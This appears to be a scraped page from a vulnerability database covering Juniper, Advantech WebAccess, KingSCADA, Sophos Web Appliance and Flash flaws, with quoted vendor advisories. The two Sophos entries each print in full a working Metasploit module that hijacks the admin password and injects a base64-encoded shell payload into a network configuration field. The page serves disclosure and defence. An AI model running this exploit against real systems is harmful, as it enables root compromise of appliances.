VARIoT IoT vulnerabilities database

Cross-site scripting (XSS) vulnerability in J-Web in Juniper Junos before 11.4R11, 11.4X27 before 11.4X27.62 (BBE), 12.1 before 12.1R9, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.2 before 12.2R7, 12.3 before 12.3R6, 13.1 before 13.1R4, 13.2 before 13.2R3, and 13.3 before 13.3R1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Juniper Junos is prone to an HTML-injection vulnerability. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Juniper Networks Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. J-Web is a network management tool for routers or switches using Junos. The following releases are affected: Juniper Networks Junos Release 13.1 through 13.3, Release 12.1 through 12.3, 12.1x44, 12.1x45, 12.1x46, 11.4, 11.4x27

The Enhanced Web Filtering (EWF) in Juniper Junos before 10.4R15, 11.4 before 11.4R9, 12.1 before 12.1R7, 12.1X44 before 12.1X44-D20, 12.1X45 before 12.1X45-D10, and 12.1X46 before 12.1X46-D10, as used in the SRX Series services gateways, allows remote attackers to cause a denial of service (flow daemon crash and restart) via a crafted URL. Juniper Junos is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Networks Junos 10.4, 11.4, 12.1x44, 12.1x45, 12.1x46, 12.1

Unspecified vulnerability in Juniper Junos before 11.4R10-S1, before 11.4R11, 12.1X44 before 12.1X44-D26, 12.1X44 before 12.1X44-D30, 12.1X45 before 12.1X45-D20, and 12.1X46 before 12.1X46-D10, when Dynamic IPsec VPN is configured, allows remote attackers to cause a denial of service (new Dynamic VPN connection failures and CPU and disk consumption) via unknown vectors. Juniper Junos is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Networks Junos 12.1x45, 12.1x46, 12.1, 12.1x44, 11.4

An attacker may exploit this vulnerability by passing an overly long value from the AccessCode argument to the control. This will overflow the static stack buffer. The attacker may then execute code on the target device remotely. Advantech WebAccess Contains a stack-based buffer overflow vulnerability.Too long by a third party AccessCode Arbitrary code may be executed via an argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing AccessCode parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, causing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

The BWOCXRUN.BwocxrunCtrl.1 control contains a method named OpenUrlToBufferTimeout. This method takes a URL as a parameter and returns its contents to the caller in JavaScript. The URLs are accessed in the security context of the current browser session. The control does not perform any URL validation and allows file:// URLs that access the local disk. The method can be used to open a URL (including file URLs) and read the URLs through JavaScript. This method could also be used to reach any arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

An attacker may pass an overly long value from the AccessCode2 argument to the control to overflow the static stack buffer. The attacker may then remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing Username parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions

An attacker using SQL injection may use arguments to construct queries without proper sanitization. The DBVisitor.dll is exposed through SOAP interfaces, and the exposed functions are vulnerable to SOAP injection. This may allow unexpected SQL action and access to records in the table of the software database or execution of arbitrary code. Advantech WebAccess of DBVisitor.dll Is SQL An injection vulnerability exists.Third party to unspecified functions SOAP Any via request SQL The command may be executed. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBVisitor.dll component. These flaws allow an attacker to execute arbitrary SQL statements in the context of the web service and to exfiltrate data (including the account names and password hashes) from the vulnerable product. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. There is a SQL injection vulnerability in Advantech WebAccess. Because the SOAP interface exposes DBVisitor.dll, it allows an attacker to exploit a vulnerability to submit a specially crafted SOAP request, inject or manipulate a SQL query, and obtain sensitive sensitive information or manipulate the database. Advantech WebAccess is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, to access or modify data, or to exploit vulnerabilities in the underlying database. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

By providing an overly long string to the NodeName parameter, an attacker may be able to overflow the static stack buffer. The attacker may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing NodeName parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions

The BWOCXRUN.BwocxrunCtrl.1 control contains a method named “OpenUrlToBuffer.” This method takes a URL as a parameter and returns its contents to the caller in JavaScript. The URLs are accessed in the security context of the current browser session. The control does not perform any URL validation and allows “file://” URLs that access the local disk. The method can be used to open a URL (including file URLs) and read file URLs through JavaScript. This method could also be used to reach any arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

An attacker can exploit this vulnerability by copying an overly long NodeName2 argument into a statically sized buffer on the stack to overflow the static stack buffer. An attacker may use this vulnerability to remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing odeName2 parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, causing applications to crash or execute arbitrary code. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions

The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability.The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw will allow for an unprivileged user to change the admin's password and a remote code execution vulnerability exists when updating the network interface. This allows for an attacker to execute under root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution', 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. No server-side sanitization is done on values passed when configuring a static network interface. This allows an administrator user to run arbitrary commands in the context of the web application, which is root when configuring the network interface. This module will inadvertently delete any other users that may have been present as a side effect of changing the admin's password. }, 'Author' => [ 'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 500, 'DisableNops' => true, 'BadChars' => "", #base64 encryption ftw! 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Targets' => [ [ 'Sophos Web Protection Appliance 3.8.1.1', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 8 2014' )) register_options( [ OptString.new('USERNAME', [true, 'The username to authenticate as', nil]), OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]), OptString.new('TARGETURI', [true, 'The target URI', '/']), Opt::RPORT(443) ], self.class ) end def exploit init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') }) if !init or !init.body fail_with("Could not connect to host") end print_status("Getting STYLE key...") style = '' init.body.each_line do |line| next if line !~ /name="STYLE" value="(.*)"/ style = $1 end if style == '' fail_with("Could not find style key.") end post = { 'STYLE' => style, 'destination' => '', 'section' => '', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), 'method' => 'POST', 'vars_post' => post }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ fail_with("Authentication failed") end #I don't know what salt is being used to hash these #passwords (probably in js somewhere), so I have #to use a static one that I saw being POSTed while #exploring, it is 'notpassword'. # #This will actually delete every other user that exists #except for admin, whose password will be changed # #whoops admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"' admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default ' admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"' admin_hash << ': [], "user_id": 0}]' post = { 'action' => 'save', 'STYLE' => style, 'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])), 'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])), 'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])), 'admins' => admin_hash } print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), 'method' => 'POST', 'vars_post' => post }) if !passchange or passchange.code != 200 fail_with("Couldn't update admin's password") end print_status("Logging in as the admin now") init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') }) if !init or init.code != 200 fail_with("Couldn't reget index page for admin auth") end init.body.each_line do |line| next if line !~ /name="STYLE" value="(.*)"/ style = $1 end post = { 'STYLE' => style, 'destination' => '', 'section' => '', 'username' => 'admin', 'password' => 'notpassword' } login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), 'method' => 'POST', 'vars_post' => post }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ fail_with("Couldn't login as admin") end pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded)) post = { 'STYLE' => style, 'dhcp' => 'no', 'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16", 'gateway' => '192.168.1.254', 'sb_bridge' => 'explicit', 'netmask' => '255.255.255.0', 'sb_linktype' => 'auto', 'dns' => 'yes', 'dns1' => '192.168.1.254', 'dns2' => '', 'dns3' => '' } print_status("Sending payload") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), 'method' => 'POST', 'vars_post' => post, }) end end

By providing an overly long string to the UserName parameter, an attacker may be able to overflow the static stack buffer. The attacker may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing NodeName parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions

Stack-based buffer overflow in WellinTech KingSCADA before 3.1.2.13 allows remote attackers to execute arbitrary code via a crafted packet. Authentication is not required to exploit this vulnerability.The specific flaw exists within the protocol parsing code contained in kxNetDispose.dll. The parent service is called AEserver.exe and listens on port 12401. The process performs arithmetic on an user-supplied value used to determine the size of a copy operation allowing a potential integer wrap to cause a stack buffer overflow. An unauthenticated attacker can leverage this vulnerability to execute code under the context of the SYSTEM user. The KingSCADA family of products is a Windows-based monitoring and data acquisition application. WellinTech KingSCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed attacks will likely cause denial-of-service conditions. KingSCADA versions prior to 3.1.2.13 is vulnerable

To exploit this vulnerability, the attacker sends data from the GotoCmd argument to control. If the value of the argument is overly long, the static stack buffer can be overflowed. This will allow the attacker to execute arbitrary code remotely. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied GotoCmd string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing GotoCmd parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions

The BWOCXRUN.BwocxrunCtrl.1 control contains a method named “CreateProcess.” This method contains validation to ensure an attacker cannot run arbitrary command lines. After validation, the values supplied in the HTML are passed to the Windows CreateProcessA API. The validation can be bypassed allowing for running arbitrary command lines. The command line can specify running remote files (example: UNC command line). A function exists at offset 100019B0 of bwocxrun.ocx. Inside this function, there are 3 calls to strstr to check the contents of the user specified command line. If “\setup.exe,” “\bwvbprt.exe,” or “\bwvbprtl.exe” are contained in the command line (strstr returns nonzero value), the command line passes validation and is then passed to CreateProcessA. Advantech WebAccess of bwocxrun.ocx Inside BWOCXRUN.BwocxrunCtrl.1 ActiveX Control CreateProcess Method from any pathname (1) setup.exe , (2) bwvbprt.exe ,and (3) bwvbprtl.exe A vulnerability exists that allows program execution. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. http://cwe.mitre.org/data/definitions/77.htmlFrom an arbitrary path name via a crafted argument by a third party (1) setup.exe , (2) bwvbprt.exe ,and (3) bwvbprtl.exe The program may be executed. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx. The control exposes a scriptable method 'CreateProcess'. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and remote code-execution vulnerability. Attackers can leverage these issues to gain root privileges and execute arbitrary code. Successfully exploiting these issues will result in the complete compromise of affected computers. Versions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution', 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. By taking advantage of a mass assignment vulnerability that allows an unprivileged authenticated user to change the admininistrator's password hash, the module updates the password to login as the admin to reach the second vulnerability. No server-side sanitization is done on values passed when configuring a static network interface. This module will inadvertently delete any other users that may have been present as a side effect of changing the admin's password. }, 'Author' => [ 'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 500, 'DisableNops' => true, 'BadChars' => "", #base64 encryption ftw! 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Targets' => [ [ 'Sophos Web Protection Appliance 3.8.1.1', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 8 2014' )) register_options( [ OptString.new('USERNAME', [true, 'The username to authenticate as', nil]), OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]), OptString.new('TARGETURI', [true, 'The target URI', '/']), Opt::RPORT(443) ], self.class ) end def exploit init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') }) if !init or !init.body fail_with("Could not connect to host") end print_status("Getting STYLE key...") style = '' init.body.each_line do |line| next if line !~ /name="STYLE" value="(.*)"/ style = $1 end if style == '' fail_with("Could not find style key.") end post = { 'STYLE' => style, 'destination' => '', 'section' => '', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), 'method' => 'POST', 'vars_post' => post }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ fail_with("Authentication failed") end #I don't know what salt is being used to hash these #passwords (probably in js somewhere), so I have #to use a static one that I saw being POSTed while #exploring, it is 'notpassword'. # #This will actually delete every other user that exists #except for admin, whose password will be changed # #whoops admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"' admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default ' admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"' admin_hash << ': [], "user_id": 0}]' post = { 'action' => 'save', 'STYLE' => style, 'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])), 'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])), 'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])), 'admins' => admin_hash } print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), 'method' => 'POST', 'vars_post' => post }) if !passchange or passchange.code != 200 fail_with("Couldn't update admin's password") end print_status("Logging in as the admin now") init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') }) if !init or init.code != 200 fail_with("Couldn't reget index page for admin auth") end init.body.each_line do |line| next if line !~ /name="STYLE" value="(.*)"/ style = $1 end post = { 'STYLE' => style, 'destination' => '', 'section' => '', 'username' => 'admin', 'password' => 'notpassword' } login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), 'method' => 'POST', 'vars_post' => post }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ fail_with("Couldn't login as admin") end pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded)) post = { 'STYLE' => style, 'dhcp' => 'no', 'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16", 'gateway' => '192.168.1.254', 'sb_bridge' => 'explicit', 'netmask' => '255.255.255.0', 'sb_linktype' => 'auto', 'dns' => 'yes', 'dns1' => '192.168.1.254', 'dns2' => '', 'dns3' => '' } print_status("Sending payload") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), 'method' => 'POST', 'vars_post' => post, }) end end

Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356" References ========== [ 1 ] CVE-2014-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498 [ 2 ] CVE-2014-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499 [ 3 ] CVE-2014-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502 [ 4 ] CVE-2014-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503 [ 5 ] CVE-2014-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504 [ 6 ] CVE-2014-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506 [ 7 ] CVE-2014-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507 [ 8 ] CVE-2014-0508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508 [ 9 ] CVE-2014-0509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509 [ 10 ] CVE-2014-0515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201405-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:0380-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0380.html Issue date: 2014-04-09 CVE Names: CVE-2014-0506 CVE-2014-0507 CVE-2014-0508 CVE-2014-0509 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09, listed in the References section. Two flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0506, CVE-2014-0507) A flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0508) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially crafted web page. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1085581 - CVE-2014-0506 CVE-2014-0507 flash-plugin: two flaws leading to code execution (APSB14-09) 1085585 - CVE-2014-0508 flash-plugin: information disclosure flaw (APSB14-09) 1085586 - CVE-2014-0509 flash-plugin: cross-site scripting flaw (APSB14-09) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0506.html https://www.redhat.com/security/data/cve/CVE-2014-0507.html https://www.redhat.com/security/data/cve/CVE-2014-0508.html https://www.redhat.com/security/data/cve/CVE-2014-0509.html https://access.redhat.com/security/updates/classification/#critical https://helpx.adobe.com/security/products/flash-player/apsb14-09.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTRQk9XlSAg2UNWIIRAksjAKCbnm4UGitMzrcZoEuifY3AS5L9hQCdH2Ou CgUxC7S1jhlSSEYdIzvdiL8= =tqNu -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

